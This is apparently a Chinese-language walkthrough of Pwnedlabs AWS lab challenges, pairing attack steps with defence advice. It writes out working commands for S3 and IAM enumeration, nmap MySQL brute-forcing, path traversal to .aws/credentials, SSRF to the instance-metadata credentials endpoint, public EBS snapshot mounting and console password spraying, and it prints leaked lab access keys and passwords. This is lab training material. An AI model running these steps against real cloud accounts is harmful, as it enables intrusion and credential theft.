Pwnedlabs靶场Writeup：AWS云安全渗透实战指南<\/h1>

1. 从公开S3存储桶识别AWS账户ID<\/h2>

技术要点<\/strong>：<\/p>

通过s3:ResourceAccount<\/code>策略条件枚举AWS账户ID<\/li>
使用s3-account-search<\/code>工具进行逐位猜测<\/li> <\/ul> 操作步骤<\/strong>：<\/p> 执行命令：<\/li> <\/ol> s3-account-search arn:aws:iam::427648302155:role\/LeakyBucket mega-big-tech <\/span><\/span><\/code><\/pre> 工具会逐位猜测账户ID，最终得到完整ID：107513503799<\/code><\/li> <\/ol> 防御措施<\/strong>：<\/p> 限制S3存储桶的公开访问权限<\/li> 监控异常访问模式<\/li> <\/ul> 2. AWS IAM枚举基础<\/h2> 关键命令<\/strong>：<\/p> # 获取当前身份信息<\/span> <\/span><\/span>aws sts get-caller-identity <\/span><\/span> <\/span><\/span># 获取用户信息<\/span> <\/span><\/span>aws iam get-user <\/span><\/span> <\/span><\/span># 枚举用户所属组<\/span> <\/span><\/span>aws iam list-groups-for-user --user-name dev01 <\/span><\/span> <\/span><\/span># 列出附加的用户策略<\/span> <\/span><\/span>aws iam list-attached-user-policies --user-name dev01 <\/span><\/span> <\/span><\/span># 列出策略版本<\/span> <\/span><\/span>aws iam list-policy-versions --policy-arn arn:aws:iam::aws:policy\/AmazonGuardDutyReadOnlyAccess <\/span><\/span> <\/span><\/span># 获取策略内容<\/span> <\/span><\/span>aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy\/AmazonGuardDutyReadOnlyAccess --version-id v3 <\/span><\/span> <\/span><\/span># 列出内联策略<\/span> <\/span><\/span>aws iam list-user-policies --user-name dev01 <\/span><\/span> <\/span><\/span># 获取内联策略内容<\/span> <\/span><\/span>aws iam get-user-policy --user-name dev01 --policy-name S3_Access <\/span><\/span> <\/span><\/span># 获取角色信息<\/span> <\/span><\/span>aws iam get-role --role-name BackendDev <\/span><\/span> <\/span><\/span># 获取附加的角色策略<\/span> <\/span><\/span>aws iam list-attached-role-policies --role-name BackendDev <\/span><\/span><\/code><\/pre>防御建议<\/strong>：<\/p> 遵循最小权限原则<\/li> 定期审计IAM策略<\/li> 禁用不必要的内联策略<\/li> <\/ul> 3. AWS S3枚举基础<\/h2> 攻击流程<\/strong>：<\/p> 发现公开可读的S3存储桶：<\/li> <\/ol> aws s3 cp s3:\/\/dev.huge-logistics.com\/shared\/hl_migration_project.zip .\/ --no-sign-request <\/span><\/span><\/code><\/pre> 解压后发现AKSK（访问密钥和秘密密钥）<\/li> 使用泄露的凭据访问受限内容：<\/li> <\/ol> aws s3 cp s3:\/\/dev.huge-logistics.com\/admin\/flag.txt .\/ <\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p> migration-files\/test-export.xml<\/code>文件包含敏感信息：<\/li> <\/ul> <CredentialEntry><\/span> <\/span><\/span> <ServiceType><\/span>AWS IT Admin<\/ServiceType><\/span> <\/span><\/span> <AccountID><\/span>794929857501<\/AccountID><\/span> <\/span><\/span> <AccessKeyID><\/span>AKIA3SFMDAPOQRFWFGCD<\/AccessKeyID><\/span> <\/span><\/span> <SecretAccessKey><\/span>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<\/SecretAccessKey><\/span> <\/span><\/span><\/CredentialEntry><\/span> <\/span><\/span><\/code><\/pre>防御措施<\/strong>：<\/p> 加密敏感数据<\/li> 实施严格的存储桶策略<\/li> 禁用不必要的公开访问<\/li> <\/ul> 4. 利用暴露的RDS实例<\/h2> 攻击步骤<\/strong>：<\/p> 端口扫描发现开放数据库服务：<\/li> <\/ol> nmap -Pn -p3306,5432,1433,1521 exposed.cw9ow1llpfvz.eu-north-1.rds.amazonaws.com <\/span><\/span><\/code><\/pre> 暴力破解MySQL凭据：<\/li> <\/ol> nmap -Pn -p3306 --script=<\/span>mysql-brute --script-args brute.delay=<\/span>10,brute.mode=<\/span>creds,brute.credfile=<\/span>mysql-creds.txt exposed.cw9ow1llpfvz.eu-north-1.rds.amazonaws.com <\/span><\/span><\/code><\/pre> 使用获得的凭据连接数据库并获取flag：<\/li> <\/ol> mysql -<\/span>udbuser -<\/span>p123 -<\/span>h exposed.cw9ow1llpfvz.eu-<\/span>north-<\/span>1<\/span>.rds.amazonaws.com <\/span><\/span>use user_info; <\/span><\/span>select<\/span> *<\/span> from<\/span> flag; <\/span><\/span><\/code><\/pre>防御建议<\/strong>：<\/p> # 列出RDS实例<\/span> <\/span><\/span>aws rds describe-db-instances <\/span><\/span> <\/span><\/span># 识别公开访问的RDS<\/span> <\/span><\/span>aws rds describe-db-instances --query 'DBInstances[*].PubliclyAccessible'<\/span> --query 'DBInstances[*].DBInstanceIdentifier'<\/span> <\/span><\/span><\/code><\/pre> 将公开访问的RDS设置为私有<\/li> 实施网络访问控制<\/li> <\/ul> 5. 路径遍历获取AWS凭证<\/h2> 攻击方法<\/strong>：<\/p> 利用路径遍历漏洞读取.aws\/credentials<\/code>文件<\/li> 获取AKSK后验证权限：<\/li> <\/ol> aws sts get-caller-identity <\/span><\/span><\/code><\/pre> 使用凭证访问S3获取flag：<\/li> <\/ol> aws s3 cp s3:\/\/huge-logistics-bucket\/flag.txt .\/ <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> 云环境中路径遍历攻击应优先检查.aws<\/code>目录<\/li> \/etc\/passwd<\/code>可帮助识别云用户<\/li> <\/ul> 6. SSRF攻击AWS元数据服务<\/h2> 攻击流程<\/strong>：<\/p> 发现SSRF漏洞端点：\/status\/status.php<\/code><\/li> 获取IAM角色信息：<\/li> <\/ol> http:\/\/target\/status\/status.php?name=169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/ <\/code><\/pre> 获取临时凭证：<\/li> <\/ol> http:\/\/target\/status\/status.php?name=169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/MetapwnedS3Access <\/code><\/pre> 使用临时凭证访问受限S3资源：<\/li> <\/ol> aws s3 cp s3:\/\/huge-logistics-storage\/backup\/flag.txt .\/ <\/span><\/span><\/code><\/pre>防御措施<\/strong>：<\/p> 禁用IMDSv1，强制使用IMDSv2<\/li> 实施网络控制限制元数据服务访问<\/li> 验证用户输入<\/li> <\/ul> 7. 利用公开的EBS快照<\/h2> 攻击步骤<\/strong>：<\/p> 枚举当前权限：<\/li> <\/ol> aws sts get-caller-identity <\/span><\/span>aws iam list-attached-user-policies --user-name intern <\/span><\/span><\/code><\/pre> 发现可公开访问的快照：<\/li> <\/ol> aws ec2 describe-snapshot-attribute --snapshot-id snap-0c0679098c7a4e636 --attribute createVolumePermission <\/span><\/span><\/code><\/pre> 创建并挂载卷：<\/li> <\/ol> sudo mkdir \/test <\/span><\/span>sudo mount \/dev\/xvdf3 \/test <\/span><\/span><\/code><\/pre> 发现敏感文件s3_download_file.php<\/code>包含AKSK<\/li> 使用凭证访问S3获取flag<\/li> <\/ol> 防御建议<\/strong>：<\/p> # 检测公开快照<\/span> <\/span><\/span>aws ec2 describe-snapshots --owner-id self --restorable-by-user-ids all --no-paginate <\/span><\/span><\/code><\/pre> 将公开快照设为私有<\/li> 轮换快照上的所有凭据<\/li> <\/ul> 8. 使用External ID获取特权角色<\/h2> 攻击流程<\/strong>：<\/p> 发现泄露的config.json<\/code>文件包含AKSK<\/li> 枚举当前权限：<\/li> <\/ol> aws sts get-caller-identity <\/span><\/span>aws iam list-attached-user-policies --user-name data-bot <\/span><\/span><\/code><\/pre> 列出Secrets Manager中的秘密：<\/li> <\/ol> aws secretsmanager list-secrets <\/span><\/span><\/code><\/pre> 获取外部ID凭证：<\/li> <\/ol> { <\/span><\/span> "Username"<\/span>: "ext-cost-user"<\/span>, <\/span><\/span> "Password"<\/span>: "K33pOurCostsOptimized!!!!"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre> 获取角色信息：<\/li> <\/ol> aws iam get-role --role-name ExternalCostOpimizeAccess <\/span><\/span><\/code><\/pre> 使用External ID获取临时凭证：<\/li> <\/ol> aws sts assume-role --role-arn arn:aws:iam::427648302155:role\/ExternalCostOpimizeAccess --role-session-name test --external-id 37911<\/span> <\/span><\/span><\/code><\/pre> 获取支付卡信息：<\/li> <\/ol> aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:427648302155:secret:billing\/hl-default-payment-xGmMhK <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> External ID用于跨账户访问控制<\/li> 临时凭证的有效期有限<\/li> <\/ul> 9. 凭证滥用识别与执行<\/h2> 攻击方法<\/strong>：<\/p> 从公开S3存储桶下载asana-cloud-migration-backup.json<\/code><\/li> 发现泄露的AKSK：<\/li> <\/ol> Access key ID: AKIATRPHKUQK4TXINWX4 Secret access key: prWYLnFxk7yCJjkpCMaDyOCK8\/qQFx4L6IKcTxXp <\/code><\/pre> 枚举DynamoDB表：<\/li> <\/ol> aws dynamodb list-tables <\/span><\/span>aws dynamodb scan --table-name analytics_app_users > output.json <\/span><\/span><\/code><\/pre> 破解密码哈希：<\/li> <\/ol> hashcat -m 1400<\/span> hash.txt rockyou.txt --force --username <\/span><\/span><\/code><\/pre> 使用GoAWSConsoleSpray<\/code>进行控制台喷洒攻击：<\/li> <\/ol> .\/GoAWSConsoleSpray -a 243687662613<\/span> -u user.txt -p pass.txt <\/span><\/span><\/code><\/pre> 成功登录后从user_order_logs<\/code>表获取flag<\/li> <\/ol> 防御措施<\/strong>：<\/p> 实施MFA（多因素认证）<\/li> 监控异常登录尝试<\/li> 定期轮换凭证<\/li> <\/ul> 总结与最佳实践<\/h2> 攻击面总结<\/strong>：<\/p> 公开的S3存储桶和EBS快照<\/li> IAM权限配置不当<\/li> 凭证硬编码和泄露<\/li> SSRF漏洞利用<\/li> 数据库暴露和弱凭证<\/li> <\/ol> 防御建议<\/strong>：<\/p> 最小权限原则<\/strong>：严格限制IAM权限<\/li> 加密敏感数据<\/strong>：使用KMS等服务加密存储<\/li> 监控与审计<\/strong>：启用CloudTrail和GuardDuty<\/li> 凭证管理<\/strong>：避免硬编码，定期轮换<\/li> 网络控制<\/strong>：限制公开访问的资源<\/li> 漏洞管理<\/strong>：定期扫描和修复漏洞<\/li> <\/ol> 通过Pwnedlabs靶场的实践，可以全面了解AWS环境中的常见安全问题和防御措施，是提升云安全能力的优秀学习资源。<\/p>